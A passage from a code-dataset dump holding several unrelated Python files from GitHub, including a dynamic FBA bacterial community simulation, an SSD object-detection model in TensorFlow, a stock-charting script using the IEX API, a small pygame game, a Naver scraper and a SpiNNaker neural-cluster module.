= 0\n yd = [0 for i in exchg_order]\n dfba_RHS.failtimes += [t]\n return np.array([xd] + yd)\n\n\n\ndef com_dfba_RHS(t,y,params):\n models = params[0]\n exchg_order = params[1] #list of rxn ids in media file\n kappas = params[2]\n deathrates = params[3]\n inflow = params[4]\n xs = y[:len(models)]\n yvec = y[len(models):]\n xdts = []\n ydots = np.zeros(len(yvec))\n for i in range(len(models)):\n xx = xs[i]\n state_vec = np.array([xx] + list(yvec))\n rhs = dfba_RHS(t,state_vec,[models[i],exchg_order,kappas[i],deathrates[i],inflow])\n xdts += [rhs[0]]\n ydots = ydots + np.array(rhs[1:])\n return np.array([xdts + list(ydots)])\n\n\n\n\n\ncombos=[['E.coli','M.tuberculosis'],['E.coli','S.cerevisiae'],['S.cerevisiae','M.tuberculosis'],['E.coli','P.putida'],['E.coli','S.cerevisiae','M.tuberculosis'],['E.coli','S.cerevisiae','P.putida','M.tuberculosis']]\nfor desired_models in combos:\n model_file_info = pd.read_csv('bigg_model_file_info.txt',dtype = str)\n endt = 15\n\n cobra_models = {}\n\n for mod in desired_models:\n if any(model_file_info.Species == mod):\n flnm = model_file_info.loc[model_file_info.Species == mod,'File'].iloc[0]\n cobra_models[mod] = cb.io.load_json_model(flnm)\n if not cobra_models[mod].name:\n cobra_models[mod].name = model_file_info.loc[model_file_info.Species == mod,'Species'].iloc[0] + \"_\" + model_file_info.loc[model_file_info.Species == mod,'ID'].iloc[0]\n else:\n print(\"Error: No model of species \" + mod)\n\n\n print(\"Loaded \" + str(len(cobra_models)) + \" models successfully\")\n\n\n m9file = \"modelsfromBiGG/sample_models/m9med.csv\"\n kappa_fl = \"modelsfromBiGG/sample_models/model_exchange.json\"\n\n m9media_DF = pd.read_csv(m9file)\n with open(kappa_fl) as fl:\n kappa_vals = json.load(fl)\n\n\n\n #compute dfba\n # modl1 = cobra_models[desired_models[0]]\n # modl2 = cobra_models[desired_models[1]]\n ## Get exchange reactions from minimal medium (minimized by components)\n # initial_growth1 = modl1.slim_optimize()\n # min_med1 = cb.medium.minimal_medium(modl1,initial_growth1,minimize_components = True)\n # initial_growth2 = modl2.slim_optimize()\n # min_med2 = 
cb.medium.minimal_medium(modl2,initial_growth2,minimize_components = True)\n cust_media = {}\n modids = []\n kappas = []\n exchg_ids = []\n\n for model in desired_models:\n flnm = model_file_info.loc[model_file_info.Species == model,'File'].iloc[0]\n cobmod = cb.io.load_json_model(flnm)\n exrxns = [rxn.id for rxn in cobmod.reactions if 'EX' in rxn.id]\n modid = model_file_info.loc[model_file_info.Species == model,'ID'].iloc[0]\n # kappas_used[model] = dict([(m9media_DF.loc[i,'exchange reaction id'],1.0) for i in m9media_DF.index if m9media_DF.loc[i,'exchange reaction id'] in kappa_vals[modid].keys()])\n # m9dict = dict([(m9media_DF.loc[i,'exchange reaction id'],(1.0*m9media_DF.loc[i,'initial metabolite value'])) for i in m9media_DF.index if m9media_DF.loc[i,'exchange reaction id'] in kappa_vals[modid].keys()])\n\n # kappas_used[model] = dict([(m9media_DF.loc[i,'exchange reaction id'],kappa_vals[modid][m9media_DF.loc[i,'exchange reaction id']]) for i in m9media_DF.index if m9media_DF.loc[i,'exchange reaction id'] in kappa_vals[modid].keys()])\n m9dict = dict([(m9media_DF.loc[i,'exchange reaction id'],(m9media_DF.loc[i,'initial metabolite value'])*kappa_vals[modid][m9media_DF.loc[i,'exchange reaction id']]) for i in m9media_DF.index if m9media_DF.loc[i,'exchange reaction id'] in kappa_vals[modid].keys()])\n cust_media[model] = m9dict\n cobra_models[model].medium = m9dict\n # modids += [modid]\n exchg_ids += list(m9dict.keys())\n\n exchg_ids = list(np.unique(exchg_ids))\n\n for m in desired_models:\n kappas += [[kappa_vals[modid][exch] if exch in kappa_vals[modid].keys() else 0 for exch in exchg_ids]]\n\n\n y_init = [m9media_DF.loc[m9media_DF.loc[:,'exchange reaction id'] == er,'initial metabolite value'].values[0] for er in exchg_ids]\n flow = []\n for i in y_init:\n if i == 'D-Glucose':\n flow += [0.2]\n elif i == 'O2 O2':\n flow += [0.2]\n else:\n flow += [0]\n\n # exchg_ids = list(np.unique(list(cust_media[desired_models[0]].keys()) + list(cust_media[desired_models[1]].keys())))\n # modl1.medium = cust_media[desired_models[0]]\n # modl2.medium = cust_media[desired_models[1]]\n\n # modid1 = model_file_info.loc[model_file_info.Species == desired_models[0],'ID'].iloc[0]\n # modid2 = model_file_info.loc[model_file_info.Species == desired_models[1],'ID'].iloc[0]\n\n\n # kappa1 = [kappa_vals[modid1][exch] if exch in kappa_vals[modid1].keys() else 0 for exch in exchg_ids]\n # kappa2 = [kappa_vals[modid2][exch] if exch in kappa_vals[modid2].keys() else 0 for exch in exchg_ids]\n\n # print('EX_ca2_e' in cust_media[desired_models[0]].keys())\n # print('EX_ca2_e' in cust_media[desired_models[1]].keys())\n # print('EX_ca2_e' in kappa_vals[modid1].keys())\n # print('EX_ca2_e' in kappa_vals[modid2].keys())\n\n\n # y_init = [cust_media[desired_models[0]][exchg_ids[i]]/kappa_vals[modid1][exchg_ids[i]] if exchg_ids[i] in cust_media[desired_models[0]].keys() else cust_media[desired_models[1]][exchg_ids[i]]/kappa_vals[modid2][exchg_ids[i]] for i in range(len(exchg_ids))]\n\n\n with open(direct + \"/\" + \"_\".join(desired_models) + \"_log.txt\",'w') as logfl:\n\n logfl.write(\" & \".join(desired_models))\n\n\n\n x_init = [0.3]*len(desired_models)\n for meth in [\"vode\",\"zvode\",\"lsoda\",\"dopri5\",\"dop853\"]:\n\n logfl.write(\"Both:\" + meth + \"\\n\")\n\n #### intitialize ODE\n dfba2 = ode(com_dfba_RHS).set_integrator(meth)\n init_v = x_init + y_init\n dfba2.set_initial_value(init_v,0)\n dfba2.set_f_params([[cobra_models[desmod] for desmod in 
desired_models],exchg_ids,kappas,[0.2]*len(desired_models),flow])\n\n\n x = [np.array(x_init)]\n yv = [np.array(y_init)]\n t = [0]\n\n dfba_RHS.optcount = 0\n dfba_RHS.failtimes = []\n\n # x = dfba2.integrate(endt)\n\n while dfba2.t < endt and dfba2.successful():\n sl = dfba2.integrate(dfba2.t + 0.01)\n x += [sl[:len(desired_models)]]\n yv += [np.array(sl[len(desired_models):])]\n t += [dfba2.t]\n\n yv = np.array(yv)\n\n y2 = dict([(exchg_ids[i],yv.T[i]) for i in range(len(yv.T))])\n\n xd = dict([(desired_models[i],np.array(x).T[i]) for i in range(len(desired_models))])\n\n logfl.write(str(dfba_RHS.optcount) + '\\n\\n')\n # logfl.write(dfba_RHS.failtimes)\n\n if meth == \"vode\":\n fig,ax = plt.subplots(2,1,figsize = (10,10),tight_layout = True)\n if len(x) < 9:\n ax[0].set_prop_cycle(cycler(color = ['green', 'red','blue','purple','cyan','deeppink','goldenrod','slategray']))\n\n\n\n labels1 = []\n labels2 = []\n\n\n for nm,tc in xd.items():\n ax[0].plot(t,tc)\n labels1 +=[nm]\n ax[0].legend(labels1,prop={'size': 14})\n for nm,tc in y2.items():\n if nm == 'EX_glc__D_e' or nm == 'EX_o2_e':\n ax[1].plot(t,tc)\n labels2 +=[nm]\n ax[1].legend(labels2,prop={'size': 14})\n\n plt.savefig(direct + \"/\" + \"_\".join([st.replace('.','') for st in desired_models]))\n","repo_name":"jdbrunner/surfin_fba","sub_path":"surfinFBA/examples/direct_meth.py","file_name":"direct_meth.py","file_ext":"py","file_size_in_byte":8896,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"21749641201","text":"while True:\n try:\n n = int(input())\n except:\n break\n\n num = 0\n cnt = 1\n while True:\n num = num * 10 + 1\n num = num % n\n if num == 0:\n print(cnt)\n break\n cnt += 1\n\n# #숏코딩\n# import sys\n# def f(n,i=1):\n# while i % int(n) != 0:\n# i = i * 10 + 1\n# print(len(str(i)))\n\n# *map(f,sys.stdin),","repo_name":"shinlama/TIL","sub_path":"Algorithms/boj_4375_one.py","file_name":"boj_4375_one.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10033983836","text":"import tensorflow as tf\nimport tensorflow.contrib.slim as slim\nfrom hyperparameters import *\n\ndef load_vgg(sess, vgg_path):\n\n tf.saved_model.loader.load(sess, ['vgg16'], vgg_path)\n images = tf.get_default_graph().get_tensor_by_name('image_input:0')\n conv4_3_pool = tf.get_default_graph().get_tensor_by_name('pool4:0')\n conv4_3_relu = tf.get_default_graph().get_tensor_by_name('conv4_3/Relu:0') \n keep_prob = tf.get_default_graph().get_tensor_by_name('keep_prob:0')\n\n return images, conv4_3_pool, conv4_3_relu, keep_prob\n\n\ndef confidences_and_locations(net, layer_id, Confidences, Locations):\n\n with tf.variable_scope('prediction_and_location_'+layer_id):\n \n num_anchors = (NUMBER_DEFAULT_BOXES)\n prediction = slim.conv2d(net, num_anchors*NUMBER_CLASSES, [3,3], \n activation_fn=None, scope='prediction', padding='SAME')\n prediction = tf.contrib.layers.flatten(prediction)\n location = slim.conv2d(net, num_anchors*4, [3,3], activation_fn=None, scope='location')\n location = tf.contrib.layers.flatten(location)\n\n Confidences.append(prediction)\n Locations.append(location)\n\n return Confidences, Locations\n\n\ndef ssd_layers(conv4_3, conv4_3_relu):\n\n Confidences, Locations = [], []\n\n Confidences, Locations = confidences_and_locations(conv4_3_relu, 'ssd_0_vgg_', Confidences, Locations)\n\n with tf.variable_scope(\"ssd_300\"):\n with slim.arg_scope([slim.conv2d], 
normalizer_fn=slim.batch_norm, \n weights_regularizer=slim.l2_regularizer(1e-3),\n padding='SAME'):\n\n\n net = slim.conv2d(conv4_3, 1024, [3,3], scope='ssd_0')\n net = slim.conv2d(net, 1024, [1,1], scope='ssd_1')\n\n Confidences, Locations = confidences_and_locations(net, 'ssd_1', Confidences, Locations)\n\n net = slim.conv2d(net, 256, [1,1], scope='ssd_2')\n net = slim.conv2d(net, 512, [3,3], 2, scope='ssd_2_s2')\n \n Confidences, Locations = confidences_and_locations(net, 'ssd_2_s2', Confidences, Locations)\n\n net = slim.conv2d(net, 128, [1,1], scope='ssd_3')\n net = slim.conv2d(net, 256, [3,3], 2, scope='ssd_3_s2')\n\n Confidences, Locations = confidences_and_locations(net, 'ssd_3_s2', Confidences, Locations)\n \n final_Confidences = tf.concat(Confidences, 1)\n final_Locations = tf.concat(Locations, 1)\n \n return final_Confidences, final_Locations\n\n\ndef loss_function(confidences_all, locations_all):\n\n true_confidences = tf.placeholder(tf.int32, [None, NUMBER_CONFIDENCES], name=\"true_predictions\")\n confidence_loss_mask = tf.placeholder(tf.float32, [None, NUMBER_CONFIDENCES], name=\"prediction_mask\")\n true_locations = tf.placeholder(tf.float32, [None, NUMBER_LOCATIONS], name=\"true_locations\")\n \n confidences = tf.reshape(confidences_all, [-1, NUMBER_CONFIDENCES, NUMBER_CLASSES])\n prediction_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=confidences, labels=true_confidences)\n prediction_loss *= confidence_loss_mask\n prediction_loss = tf.reduce_sum(prediction_loss)\n\n location_difference = true_locations - locations_all\n location_loss_l2 = .5 * (pow(location_difference, 2))\n location_loss_l1 = tf.abs(location_difference) - .5\n smooth_l1 = tf.less(tf.abs(location_difference), 1.0)\n location_loss = tf.where(smooth_l1, location_loss_l2, location_loss_l1)\n location_loss_mask = tf.minimum(true_confidences, 1)\n location_loss_mask = tf.to_float(location_loss_mask)\n\n location_loss_mask = tf.stack([location_loss_mask] * 4, axis=2) \n location_loss_mask = tf.reshape(location_loss_mask, [-1, NUMBER_LOCATIONS])\n location_loss *= location_loss_mask\n location_loss = tf.reduce_sum(location_loss)\n\n loss = prediction_loss + location_loss + tf.reduce_sum(tf.losses.get_regularization_losses())\n \n tf.summary.histogram(\"location_difference\", location_difference)\n tf.summary.histogram(\"logits\", confidences)\n tf.summary.histogram(\"prediction_loss\", prediction_loss)\n tf.summary.histogram(\"location loss\", location_loss)\n tf.summary.histogram(\"loss\", loss)\n\n all_probabilities = tf.nn.softmax(confidences)\n probabilities, probability_confidences = tf.nn.top_k(all_probabilities)\n \n tf.summary.histogram(\"probabilities\", probabilities)\n tf.summary.histogram(\"probability_confidences\", probability_confidences)\n\n probabilities = tf.reshape(probabilities, [-1, NUMBER_CONFIDENCES])\n probability_confidences = tf.reshape(probability_confidences, [-1, NUMBER_CONFIDENCES])\n \n tf.summary.histogram(\"probability_confidences\", probability_confidences)\n\n return loss, probabilities, probability_confidences, true_locations, true_confidences, confidence_loss_mask\n\n\n\ndef optimizer(loss):\n\n adam = tf.train.AdamOptimizer(LEARNING_RATE).minimize(loss)\n\n return adam\n\n\n","repo_name":"anthony-sarkis/deep-traffic-lights","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73728905","text":"#!/usr/bin/env 
python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom iexfinance.stocks import get_historical_data\nfrom iexfinance.stocks import Stock\nfrom datetime import datetime\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nimport matplotlib.pyplot as pyplot\nimport matplotlib.dates as dates\nimport mpl_finance as mpfold\nimport json\nimport os\nstrRoot='D:\\\\denbrige\\\\180 FxOption\\\\103 FxOptionVerBack\\\\083 FX-Git-Pull\\\\14docktrader\\\\config\\\\'\nwith open(strRoot + 'iex.conf') as fJsn:\n jsnIEX = json.load(fJsn)\n\n\n# In[2]:\n\n\n# list of tickers to be processed\ndef GetStockTicker():\n strTicker = []\n strInput = input(\"Do you want to load sp500_constituents (y/n)?: \")\n if strInput in ('y', 'Y'):\n strStockFile = \"stockrow/sp500_constituents.csv\"\n if os.path.exists(strStockFile) == True:\n file=open(strStockFile, \"r\")\n reader = csv.reader(file)\n #skip header\n next(reader) \n for line in reader:\n strTicker.append(line[0])\n else:\n print(\"Error: \" + strStockFile + \" undefined\")\n elif strInput in ('n', 'N'):\n strInput = input(\"Enter ticker(s) delimited by comma: \")\n for ticker in strInput.split(','):\n strTicker.append(ticker)\n else:\n print(\"Error: User response undefined\")\n return strTicker\n\n\n# In[3]:\n\n\ndef IexStockTicker(ticker):\n # assert ticker is not empty\n if len(ticker) == 0:\n return\n \n for i in ticker:\n objStock = Stock(i, output_format='pandas', token=jsnIEX['iextoken'])\n dfCompany = objStock.get_company()\n print('\\nTicker: ' + i)\n print('CEO: ' + dfCompany.loc['CEO'][0])\n print('Company: ' + dfCompany.loc['companyName'][0])\n print('Desc: ' + dfCompany.loc['description'][0])\n print('No. of Employees: ' + str(dfCompany.loc['employees'][0]))\n print('Exchange: ' + dfCompany.loc['exchange'][0])\n print('Industry: ' + dfCompany.loc['industry'][0])\n print('Sector: ' + dfCompany.loc['sector'][0])\n print('Tags: ' + ','.join(dfCompany.loc['tags'][0]))\n print('')\n dfEst = objStock.get_estimates()\n print('Fiscal Period: ' + dfEst.loc['fiscalPeriod'][0])\n print('Report Date: ' + dfEst.loc['reportDate'][0])\n print('Consensus EPS: ' + str(dfEst.loc['consensusEPS'][0]))\n print('No. 
of Ests: ' + str(dfEst.loc['numberOfEstimates'][0]))\n print('Fiscal EndDate: ' + dfEst.loc['fiscalEndDate'][0])\n\ndef MpfPlotWave(ticker):\n # assert ticker is not empty\n if len(ticker) == 0:\n return\n \n start=datetime(2019, 2, 9)\n end=datetime(2020,2,11)\n \n # values that can be parameterized\n intEmaPeriod = 34\n intBars = 90\n\n row=0\n for i in ticker:\n ohlc = get_historical_data(i, start, end, output_format='pandas', token=jsnIEX['iextoken'])\n ohlc.columns=[\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n if (intBars+intEmaPeriod > len(ohlc)):\n print(\"Error: Bars + EmaPeriod exceeds ohlc \" + str(len(ohlc)-intBars-intEmaPeriod))\n return\n\n hEma = ohlc['High'].ewm(intEmaPeriod).mean()\n cEma = ohlc['Close'].ewm(intEmaPeriod).mean()\n lEma = ohlc['Low'].ewm(intEmaPeriod).mean()\n \n # extract OHLC into a list of lists\n lohlc = ohlc[['Open', 'High', 'Low', 'Close']].values.tolist()\n \n # convert dates in datetime format to mathplotlib dates\n mdates = dates.date2num(ohlc.index)\n \n # prepare ohlc in mathplotlib format\n mohlc = [ [mdates[i]] + lohlc[i] for i in range(len(mdates)) ]\n \n # set default font sizes\n params = {'axes.labelsize': 20,'axes.titlesize': 24}\n pyplot.rcParams.update(params)\n \n fig, ax = pyplot.subplots(figsize = (24,24))\n \n # set default tick sizes\n ax.tick_params(axis='both', which='major', labelsize=20)\n ax.tick_params(axis='both', which='minor', labelsize=18)\n \n # mpfold.plot_day_summary_ohlc(ax, mohlc[-50:], ticksize=5, colorup='#77d879', colordown='#db3f3f') # alternatively, use a barchart\n mpfold.candlestick_ohlc(ax, mohlc[-intBars:], width=0.4, colorup='#77d879', colordown='#db3f3f')\n ax.plot(hEma[-intBars:], color='red', linewidth=2, label='high, '+str(intEmaPeriod)+'-Day EMA')\n ax.plot(cEma[-intBars:], color='green', linewidth=2, label='close, '+str(intEmaPeriod)+'-Day EMA')\n ax.plot(lEma[-intBars:], color='blue', linewidth=2, label='low, '+str(intEmaPeriod)+'-Day EMA')\n\n ax.set_xlabel('Date')\n ax.set_ylabel('Price')\n ax.set_title(i +' Chart with '+str(intEmaPeriod)+'-Day EMA Wave')\n ax.legend(fontsize=20)\n ax.xaxis.set_major_formatter(dates.DateFormatter('%b %d'))\n fig.autofmt_xdate() \n \n # plt.show() # add this if you're not using Jupyter Notebook\n\n\n# In[4]:\n\n\nstrTicker = GetStockTicker()\nprint('No. 
of tickers:', len(strTicker))\nIexStockTicker(strTicker)\n\n\n# In[5]:\n\n\nMpfPlotWave(strTicker)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"dennislwm/docktrader","sub_path":"src/006iexpiece.py","file_name":"006iexpiece.py","file_ext":"py","file_size_in_byte":5099,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"}
+{"seq_id":"21877628706","text":"import pygame\r\nimport sys\r\n\r\n# Initialize Pygame and create a window\r\npygame.init()\r\nscreen_width, screen_height = 600, 500\r\nscreen = pygame.display.set_mode((screen_width, screen_height))\r\npygame.display.set_caption(\"Mario\")\r\n\r\n# Load the images of Mario running\r\nplyer_image = [pygame.image.load(\"Bilder/oben.png\").convert_alpha(),\r\n               pygame.image.load(\"Bilder/unten.png\").convert_alpha(),\r\n               pygame.image.load(\"Bilder/rechts.png\").convert_alpha(),\r\n               pygame.image.load(\"Bilder/links.png\").convert_alpha(),\r\n               pygame.image.load(\"Bilder/left1.png\").convert_alpha(),\r\n               pygame.image.load(\"Bilder/right1.png\").convert_alpha()]\r\n\r\ndef move_stone(x, y, plyer_rect):\r\n    keys = pygame.key.get_pressed()\r\n    if keys[pygame.K_UP]:\r\n        y -= speed\r\n    if keys[pygame.K_DOWN]:\r\n        y += speed\r\n    if keys[pygame.K_LEFT]:\r\n        x -= speed\r\n    if keys[pygame.K_RIGHT]:\r\n        x += speed\r\n\r\n    # Calculate the distance between the player and the stone\r\n    distance = plyer_rect.right - x\r\n\r\n    # If the player is on the left of the stone, the distance is 5 or lower, and the player is moving to the right, move the stone to the right as well\r\n    if plyer_rect.x < x and distance <= 5 and keys[pygame.K_d]:\r\n        x += speed\r\nStein_img = pygame.image.load(\"Bilder/Steine/1.png\").convert_alpha()\r\nstein = pygame.transform.smoothscale(Stein_img,(30,30))\r\nstein_rect = stein.get_rect(x=200, y=200)\r\n\r\n# Load the background image and scale it to fit the screen\r\no_background = pygame.image.load(\"Bilder/background.jpg\").convert_alpha()\r\nbackground = pygame.transform.scale(o_background, (screen_width, screen_height))\r\n\r\n# Set the player's initial position and speed\r\nplyer = plyer_image[1]\r\nplyer_rect = plyer_image[1].get_rect(x=100, y=200)\r\nspeed = 5\r\n\r\n# Create a clock to control the frame rate\r\nclock = pygame.time.Clock()\r\n\r\n# Main game loop\r\nwhile True:\r\n    # Handle events\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            pygame.quit()\r\n            sys.exit()\r\n\r\n    # Update the player's position based on key input\r\n    keys = pygame.key.get_pressed()\r\n    if keys[pygame.K_UP]:\r\n        plyer = plyer_image[0]\r\n        plyer_rect.move_ip(0, -speed)\r\n    if keys[pygame.K_DOWN]:\r\n        plyer = plyer_image[1]\r\n        plyer_rect.move_ip(0, speed)\r\n    if keys[pygame.K_RIGHT]:\r\n        if pygame.time.get_ticks() % 100 < 50:\r\n            plyer = plyer_image[2]\r\n        else:\r\n            plyer = plyer_image[5]\r\n        plyer_rect.move_ip(speed, 0)\r\n    if keys[pygame.K_LEFT]:\r\n        if pygame.time.get_ticks() % 100 < 50:\r\n            plyer = plyer_image[3]\r\n        else:\r\n            plyer = plyer_image[4]\r\n        plyer_rect.move_ip(-speed, 0)\r\n\r\n    dist_rl1 = plyer_rect.top - stein_rect.top\r\n    dist_r2 = plyer_rect.right - stein_rect.left\r\n    dist_l2 = plyer_rect.left - stein_rect.right\r\n\r\n    dist_tb1 = plyer_rect.left - stein_rect.left\r\n    dist_t2 = plyer_rect.bottom - stein_rect.top\r\n    dist_b2 = plyer_rect.top - stein_rect.bottom\r\n\r\n\r\n    #!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\r\n    # Here the player glitches; we have to play with the numbers to fix it\r\n    if dist_rl1 >= -50 and dist_rl1 <= 20 and dist_r2 >-5 
and dist_r2 <5 and keys[pygame.K_RIGHT]:\r\n stein_rect.x += speed\r\n\r\n if dist_rl1 >= -50 and dist_rl1 <= 20 and dist_l2 == 0 and keys[pygame.K_LEFT]:\r\n stein_rect.x -= speed\r\n\r\n if dist_tb1 >= -20 and dist_tb1 <= 20 and dist_t2 < 5 and dist_t2 >-4 and keys[pygame.K_DOWN]:\r\n stein_rect.y += speed\r\n\r\n if dist_tb1 >= -20 and dist_tb1 <= 20 and dist_b2 <= 0 and dist_b2 >-5 and keys[pygame.K_UP]:\r\n stein_rect.y -= speed\r\n\r\n if pygame.time.get_ticks()%1000 < 50/3:\r\n print(dist_t2)\r\n\r\n # Keep the player within the screen boundaries\r\n if plyer_rect.bottom > screen_height:\r\n plyer_rect.bottom = screen_height\r\n if plyer_rect.right > screen_width:\r\n plyer_rect.right = screen_width\r\n if plyer_rect.top < 0:\r\n plyer_rect.top = 0\r\n if plyer_rect.left < 0:\r\n plyer_rect.left = 0\r\n\r\n # Clear the screen and draw the background and player\r\n screen.blit(background, (0, 0))\r\n screen.blit(plyer, plyer_rect)\r\n screen.blit(stein, stein_rect)\r\n\r\n\r\n # Update the display\r\n pygame.display.update()\r\n\r\n # Limit the frame rate to 60 FPS\r\n clock.tick(60)\r\n\r\n\r\n\r\n","repo_name":"impecableCoders/SuperMario","sub_path":"Marrio Moma/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21683819592","text":"import requests\nfrom bs4 import BeautifulSoup\n\nreq = requests.get('https://www.naver.com/').text\nprint(req)\nsoup = BeautifulSoup(req, 'html.parser')\n# print(soup)\ntop10 = soup.select('.PM_CL_realtimeKeyword_rolling .ah_item .ah_k')\n\nfor item in top10:\n print(item.text)","repo_name":"gtj1323/DjangoStudy","sub_path":"menufactual_file/scraping_ex/naver.py","file_name":"naver.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17042991344","text":"# Import modules\nimport enum\nimport itertools\nimport logging\nimport numpy as np\nimport regions\nfrom rig import machine\n\n# Import classes\nfrom collections import defaultdict\nfrom rig_cpp_common.regions import Profiler, Statistics, System\nfrom rig_cpp_common.utils import Args\n\n# Import functions\nfrom rig_cpp_common.utils import load_regions\nfrom six import iteritems\nfrom utils import (calc_bitfield_words, calc_slice_bitfield_words,\n get_model_executable_filename, split_slice)\n\nlogger = logging.getLogger(\"pynn_spinnaker\")\n\n\n# ----------------------------------------------------------------------------\n# Regions\n# ----------------------------------------------------------------------------\nclass Regions(enum.IntEnum):\n \"\"\"Region names, corresponding to those defined in `ensemble.h`\"\"\"\n system = 0\n neuron = 1\n synapse = 2\n input_buffer = 3\n back_prop_output = 4\n flush = 5\n intrinsic_plasticity = 6\n spike_recording = 7\n analogue_recording_0 = 8\n analogue_recording_1 = 9\n analogue_recording_2 = 10\n analogue_recording_3 = 11\n analogue_recording_start = analogue_recording_0\n analogue_recording_end = analogue_recording_3 + 1\n profiler = analogue_recording_end\n statistics = analogue_recording_end + 1\n\n\n# ----------------------------------------------------------------------------\n# Vertex\n# ----------------------------------------------------------------------------\nclass Vertex(object):\n def __init__(self, parent_keyspace, neuron_slice, pop_index, vert_index):\n self.neuron_slice = neuron_slice\n\n # Build child keyspaces for 
spike and\n        # flush packets coming from this vertex\n        self.spike_keyspace = parent_keyspace(pop_index=pop_index,\n                                              vert_index=vert_index,\n                                              flush=0)\n        self.flush_keyspace = parent_keyspace(pop_index=pop_index,\n                                              vert_index=vert_index,\n                                              flush=1)\n\n        self.vert_index = vert_index\n\n        self.input_verts = []\n        self.back_prop_out_buffers = None\n        self.region_memory = None\n\n    # ------------------------------------------------------------------------\n    # Magic methods\n    # ------------------------------------------------------------------------\n    def __str__(self):\n        return \"<Vertex %s>\" % (str(self.neuron_slice))\n\n    # ------------------------------------------------------------------------\n    # Public methods\n    # ------------------------------------------------------------------------\n    def get_back_prop_in_buffer(self, post_slice):\n        # Check the slices involved overlap and that this\n        # neuron vertex actually has back propagation buffers\n        assert post_slice.overlaps(self.neuron_slice)\n        assert self.back_prop_out_buffers is not None\n\n        # Calculate start and end bit in neuron id-space\n        neuron_start_bit = max(post_slice.start, self.neuron_slice.start)\n        neuron_end_bit = min(post_slice.stop, self.neuron_slice.stop)\n        logger.debug(\"\\t\\t\\tNeuron start bit:%u, Neuron end bit:%u\",\n                     neuron_start_bit, neuron_end_bit)\n\n        # Calculate where in the buffer post_slice starts\n        buffer_start_bit = neuron_start_bit - self.neuron_slice.start\n        assert buffer_start_bit >= 0\n\n        # Separate where the buffer starts in words and bits\n        buffer_start_word = buffer_start_bit // 32\n        buffer_start_bit -= (buffer_start_word * 32)\n        buffer_end_bit = (neuron_end_bit - neuron_start_bit) + buffer_start_bit\n        buffer_num_words = calc_bitfield_words(buffer_end_bit)\n        logger.debug(\"\\t\\t\\tBuffer start word:%u, Buffer start bit:%u, Buffer end bit:%u, Buffer num words:%u\",\n                     buffer_start_word, buffer_start_bit,\n                     buffer_end_bit, buffer_num_words)\n\n        # Return offset pointers into out buffers\n        return (\n            [b + (buffer_start_word * 4) for b in self.back_prop_out_buffers],\n            buffer_num_words, buffer_start_bit, buffer_end_bit)\n\n    # ------------------------------------------------------------------------\n    # Properties\n    # ------------------------------------------------------------------------\n    @property\n    def spike_tx_key(self):\n        return self.spike_keyspace.get_value(tag=\"transmission\")\n\n    @property\n    def flush_tx_key(self):\n        return self.flush_keyspace.get_value(tag=\"transmission\")\n\n    @property\n    def routing_key(self):\n        # Check that routing key for the spike and flush keyspace are the same\n        spike_key = self.spike_keyspace.get_value(tag=\"routing\")\n        flush_key = self.flush_keyspace.get_value(tag=\"routing\")\n        assert spike_key == flush_key\n\n        # Return the spike key (arbitrarily)\n        return spike_key\n\n    @property\n    def routing_mask(self):\n        # Check that routing mask for the spike and flush keyspace are the same\n        spike_mask = self.spike_keyspace.get_mask(tag=\"routing\")\n        flush_mask = self.flush_keyspace.get_mask(tag=\"routing\")\n        assert spike_mask == flush_mask\n\n        # Return the spike mask (arbitrarily)\n        return spike_mask\n\n\n# -----------------------------------------------------------------------------\n# NeuralCluster\n# -----------------------------------------------------------------------------\nclass NeuralCluster(object):\n    # Tag names, corresponding to those defined in neuron_processor.h\n    profiler_tag_names = {\n        0: \"Synapse shape\",\n        1: \"Update neurons\",\n        2: \"Apply buffer\",\n    }\n\n    # Names of statistics\n    
statistic_names = (\n \"task_queue_full\",\n \"timer_event_overflows\",\n )\n\n def __init__(self, pop_id, cell_type, parameters, initial_values,\n sim_timestep_ms, timer_period_us, sim_ticks,\n record_sample_interval, indices_to_record, config,\n vertex_load_applications, vertex_run_applications,\n vertex_resources, keyspace, post_synaptic_width,\n requires_back_prop, pop_size):\n # Create standard regions\n self.regions = {}\n self.regions[Regions.system] = System(timer_period_us, sim_ticks)\n self.regions[Regions.neuron] = cell_type._neuron_region_class(\n cell_type, parameters, initial_values, sim_timestep_ms, pop_size)\n self.regions[Regions.back_prop_output] = regions.SDRAMBackPropOutput(\n requires_back_prop)\n self.regions[Regions.flush] = regions.Flush(config.flush_time,\n sim_timestep_ms)\n self.regions[Regions.spike_recording] = regions.SpikeRecording(\n indices_to_record, sim_timestep_ms, sim_ticks)\n self.regions[Regions.statistics] = Statistics(len(self.statistic_names))\n\n # If cell type has any receptors i.e. any need for synaptic input\n if len(cell_type.receptor_types) > 0:\n # Add a synapse region and an input buffer\n self.regions[Regions.synapse] = regions.ParameterSpace(\n cell_type._synapse_mutable_param_map,\n cell_type._synapse_immutable_param_map,\n parameters, initial_values, pop_size,\n sim_timestep_ms=sim_timestep_ms)\n\n self.regions[Regions.input_buffer] = regions.InputBuffer()\n\n # If cell type has an intrinsic plasticity parameter map\n if hasattr(cell_type, \"intrinsic_plasticity_param_map\"):\n self.regions[Regions.intrinsic_plasticity] =\\\n regions.HomogeneousParameterSpace(\n cell_type._intrinsic_plasticity_param_map,\n parameters,\n sim_timestep_ms)\n\n # Assert that there are sufficient analogue\n # recording regions for this celltype's needs\n 